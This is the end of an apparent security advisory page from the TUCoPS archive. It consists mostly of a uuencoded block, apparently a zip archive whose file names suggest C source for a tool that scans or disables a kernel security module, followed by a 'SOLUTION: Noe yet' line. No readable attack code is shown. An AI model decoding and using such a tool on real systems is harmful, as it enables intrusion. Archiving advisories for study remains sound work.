	MV]VGZ6BD$$RQ%!+6=MKAB3&)*=:&&\"4.\'?[]WFM`I:VTJWW82FW-_3CWG.-K

	M;C\\/X#,D;G=H[?/&PW5R`W=?OMR!]$;7?C.D=%S7$-(=M*8S[=Y4%*>4,)7M

	M?&M7O;>N`=U4T\'<&;`.=Z]O2A,C*-KH]P-JUVRZ\"%^LWX-KPW_6>4+:NLFM;

	M:L*(0+<&=J;=6N]-!;O6[6V%![_1\'O\\8Q*EK]V*;9RA=4UEJZ@B%^K;&?Z7S

	M;\\-WU#IPZS.GTE58V7<>Y7B-7`E5K]R>4B<G\"`1_&N=M:2*LL!W4B$<PKV.#

	MO+><<&A9:[LU;?#N[B,1\'\'CAR)D(ZJQZ)/?_<(&CRA-2Y<I^:QJOSY=VB_?A

	M,-_\"5GO36EUWK\\:\'\"R/@2QE!W._#L!NZVIO6VXY&OO;3`\"RDX-IHW^/JT+73

	M>B#O(*)S:_^\"UW:B%9S`(;M:\']XIT>5?C7NI3?5L\"/?KJ0-`$<[1.X\\BR[JO

	MS\"LP5&9O:K=#%:O#FYW^8XBM!AJ]-><X<C^0R;`RQ!+-=&\":RK7$N*4A6^?/

	M7$\\C.YS06GP0L,;T6U7G#8=N9TK:;VRRM/@M;79S!J)-[[J3I1144RY!YA/U

	M%`L&>)Z+_)&/V1A&\"TPRB`LUS07\\_!E+3\'_Z!\'$VQM\\%-;,?<\\&D!,SSV3SE

	MV(4P(LX49S(\"GB5I,>;90P2C0D&6*TCYC\"LL4WE$Z`3RL1/R\"<R82*;X,1[Q

	ME*M%F#KA*J-Q$YP7PSP6BB=%&@N8%V*>RX!&*L9<)FG,9VP\\!\"2!@X$]LDR!

	MG,9I>JEJQ)!1/$I#:X#-%M@N6**(_NLI04N03!J!G+.$TX\']8,@\\%HN(]\"=Y

	M)MF?!19ADM#&\\2Q^0\"W7_^(\"^IT4@LV(\'^J6Q4@JK@K%X\"\'/QY*@$%XR\\<@3

	M)N\\AS64PJ)`LPB$J#N,1!=W!-(DJ)`\\^\\4PQ(8JYXGEV0T#3_`F-0+(Q=H^#

	MIWD6-*,GN5@0+OD1+(_@:<HP+LA\"E*=$3%Y()7BB\".VB$J>J7*@+L9\"QAY0_

	ML\"QAE,T)Z(E+=H,WQ\"45\\./DISBL4EX$^70WR.UXO-C,*-P@\\`G$XT=.Y$_%

	M>.^2GW8DGQ\"2+)+IR7U:\\MO!E5TWE5G#<EGJW7*S7`ZN\\*-MS$4$BX[/&;[5

	MMNE_W6)\"KVQM_6&X^3X8^`,^:\\3`[R1Z^\\LEOMGVV&TTOLKE*4&1D#J&[_^A

	ML=)>?VBCX/U@8)L0>S;^^AWBTD=OBI?^YOY<WOV\'<OQV:#SQN\'Z7C^!C0^A8

	MM;TWU-%=4^@*OZWL>C#X&U!+`P04````\"`#:C\"$L(:%L\\-0$```\\\"0``\"0``

	M`&-A<\'-C86XN8[5676_B1A1]AE]QE:H-1\"[)IGW:[%9RC!.F(C;U1[+1=L4:

	M>P\"KQD8S`RRM]K_WW`$42![ZU\"@AP_TX]]PSUQ<N+]IT05ZSW*IR-C?4\\;IT

	M?75U3;&1667F/7:[5476K4E)+=5:%FQG5R2+4AM53E:F;&K*ZH)66E)9DVY6

	M*I?6,BGK3&UIVJB%=FA3FCDUROYO5H91%DU13LL\\8PR\',B5I*=6B-$86M%3-

	MNBQP,//,X$4\"IZJ:35G/*&_JHN0DS2B<MY#F/9_?]5Y1T]1,#YSRID#D2ANT

	M8S)P9=1LTJS9M5>\"0?!3-Z;,I8.(4E,%/(9Y*6O;.^6$HGF5E0NIK\';7;XF@

	MX)$B!R+HLUB!W/_#A79=[I&*)E\\M9&VRPZ5=XCX:^!4M,B-5F57Z17A[80Q\\

	MW(9M[I>>G8VL6$ME2LTE7_*Y``+9.)6966%T^-IY/,#;-J&;J=G@VO:TK!(H

	MLJRR[:M.LORONME4LIA)QGV_SR!*&&>GG4&3>;4JY`LP%7(MJV:)+B;;DYG^

	MM8=4276VD`<[N&]99)I(9@DQ&Y)UT2AFK+C(HC$\'KON2&A54B0>\"IG\"?=G68

	M<-)+F?-\\(ZGDP5<\\V?4!B\"==Z[VD;$P&(J8XO$N>W,@GG$=1^\"CZ?I]NG^\'T

	MR4V301C1UZ]N#/?Y.;E!\'W_/G.Q_&D5^\'!/\\XF$T%,@\"3.0&B?!CAT3@#=.^

	M\".X=NDT3\"L*$AN)!)`A+0H?1&>1M)H5W].!\'W@!OW5LQ%,FSK7HGDH#+W:&>

	M2R,W2H27#MV(1FDT\"F.+QEWT1>P-7?\'@]WL$$BA,_J,?)!0/W.\'PN*M;\'XS<

	MVZ%-M;#!,](CWTN8_LO)@R0@,W0H\'OF>X(/_R0=S-WIVN\'\\O#&+_CQ1!<#):

	MWWUP[]%+YS]4@-Y>&OD/S`]]Q^EMG(@D37RZ#\\-^S%\"`C_WH47A^?$/#,+8\"

	MI;\'OH$CBVO)`@3IP<U-I+*Q.(DC\\*$I\'B0B#+@,-PB<(`;(NLOM6TS\"P/4.3

	M,\'IF7-;#2N[0T\\\"\'/6()T5X2N:Q%G$3\"2QCM*!)5DS!*CIJEP+\\?BGL_\\\'SV

	MA@ST)&*_BQL2,0>(7>4GUXY2F-KV^6[`;7<\\FDS\'WB\").W+[CX+)[X-Q[[\'8

	MSTAXQTAQZ@WVZO.07[9_V#^I]$&;HFQZ\\]^.3%*I^I5);_6EV2ZE?F7&.JIG

	MI[95C2U5O$W7V\':GUJ)46\"6GMFE>F^K$=)9GR][\\K-UNRV]8;34MRV)L:).5

	MIE/6ABZZ-^WVNBD+;\"[9P3K&#LOGF:(+W6W_TV[A^5:-ZFB$M>0W)-GV\\.X[

	M(!E@@4\\@BY2I6>[L<R_P9FWS47Z,;:3&<YEAU]#\\YLA69\":C`I^I$B1:\\Q[V

	M,&\\2^DCCH0C23V//\'>TG8HPIBS%U-QR\'\'A!SQ4GEE#I<F3[0=9=0L#7%FJK-

	MM`,9P=6ALU1G,_F>?M3T^>?-%[Q,OOQ9GSFT(PG`76/O^(BN6I<7]#NO<HMC

	M%SD(:Y\"D>8;/M:TT/`.\'RNO/[[[@ESY^I//-^8X\"NY`SDZ;ST]RAGS:R\"WY7

	M7;A:+//9SGG&VK=:\"[G0\'`DAKAS2Y=^RF7:*KF5F.8P1W@$(D`J;\\IUDQ5]3

	MWC*8[!E,U,I(SM.=75LM?%=8X?JO;EKM[ZUVJ]W^%U!+`P04````\"`#:C\"$L

	MS[\\Y?JH!``#C`@``\"0```&QI9\'-O9F8N8XV1T6O;,!#&GZV_XG#)L(.=.&/L

	MH<WRU##&`BO-QA[:8C3I\'(LJDI\'D++3L?]])R:#=P]B+.7VGWW>?3_,I;-5^

	MT`C<2/!A\')2$QSWN8>!!].B@LPXVGZZW,P93V\"B!QJ.$T4CJA1[AX\\UF!I=U

	M2>TYNU!&Z%$B+\'V0RL[ZU0MI-(K4UUHG3-\"O)73._$42IM6/J+&#I8!282&L

	M\\0%$SQU,?<F>6380:5WARRN6X5&%(CG1Z1=C3)D`>ZY,$0ON=J(ZLU,Z\'!+/

	MLJ0\\H;/D8+NN#4!?JB,3EW+%J.Z@B#PLX6T)A&6#HWY7Y-\\\\W^$E3#PLN92N

	MMEVME?2MMH+KUII:F;K\'X^K>W)N\\@M-@<L\\<AM$96%!-4;.T_@\\`=D!3Y\'.)

	MAWF4\"/G2WEY_OXU,3)\'N+:$IR2)N)(]`7L:0%)L<?\'#!CCK&/=PM\'BIH*EB\\

	MC_B?R!=P$Y]9F1W<38X/*1>Q];ODHCWB8QIS5BO8KM>?V^WZ:S1QR.6Y^R8N

	MK0*OGM!V13R4+\\=,)-0K:))]:OZ\'>[Q\'_]!0^=.I@/^>)+3UIRNG9&FA37KZ

	MWU!+`P04````\"`#:C\"$LR/=FYU0```\",````\"````$UA:V5F:6QE4^;B2LS)

	ML5)(3BPH3D[,X^)*SDE-S+/BXBS*5=`M2E/0TLL\'BB46Z.6#U>@E<W&J:#@[

	M:RKHA@/U*>@F0T6YH`;`3=*#R.2CJD>35-#-A]NLP`4`4$L#!!0````(`-J,

	M(2RK/\"_.(@$``+\\!```!````>%6006_\",`R%S_A7>.52$-\"Q:QF\'P2:AH3&!

	MIAVFJ4I3LT8+2=6X:`CQWY>`IA4IAR_/SK-?NC=)KDSB2H`NSFH23`X3WE5)

	M;NUNY\"P>;(,[]56R;V@<(5O4Q+A<S#<>Q#=*48E<:<6*G._A\\Y,:74E:CP\"D

	MX.F_H9Q,LL?54Y9\"5QFIFX)PXKA0=E1.6U)CE%>OM:TTK(,$F3**XQX<H2-+

	M46-??\'SB/1ZC<Y9<N#(:X,O;<GE*H>.(&U7$MSW/4EM\'`2\\P_H.[4+05F3A*

	M\"MHGS`?OL,K6\\_=U*!5-=3$(,`Y`/R3W%/?%0`S\"I*#5?E)M<#A.X>27##%]

	M?(E#?[:OBUGK7[UB6U<+NL#A@_-A2.2:VJ7K3F>!9&DQ6CU\'*<`O4$L!`A8+

	M%`````@`F;,B+&NZ`B,H#P``J\"<```L``````````0`@`(\"!`````&%R=&EC

	M;&4N=\'AT4$L!`A8+%`````@`VHPA+-$[4ZZ)\"@``9!L```4``````````0`@

	M`(\"!40\\``&-A<\"YC4$L!`A8+%`````@`VHPA+&1QB;K2`P``U0<```4`````

	M`````0`@`(\"!_1D``&-A<\"YH4$L!`A8+%`````@`VHPA+\"&A;/#4!```/`D`

	M``D``````````0`@`(\"!\\AT``&-A<\'-C86XN8U!+`0(6\"Q0````(`-J,(2S/

	MOSE^J@$``.,\"```)``````````$`(`\"`@>TB``!L:61S;V9F+F-02P$\"%@L4

	M````\"`#:C\"$LR/=FYU0```\",````\"``````````!`\"``@(&^)```36%K969I

	M;&502P$\"%@L4````\"`#:C\"$LJSPOSB(!``\"_`0```0`````````!`\"``@($X

	:)0``>%!+!08`````!P`\'`\'(!``!Y)@``````

	`

	end

	

SOLUTION

	Noe yet


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH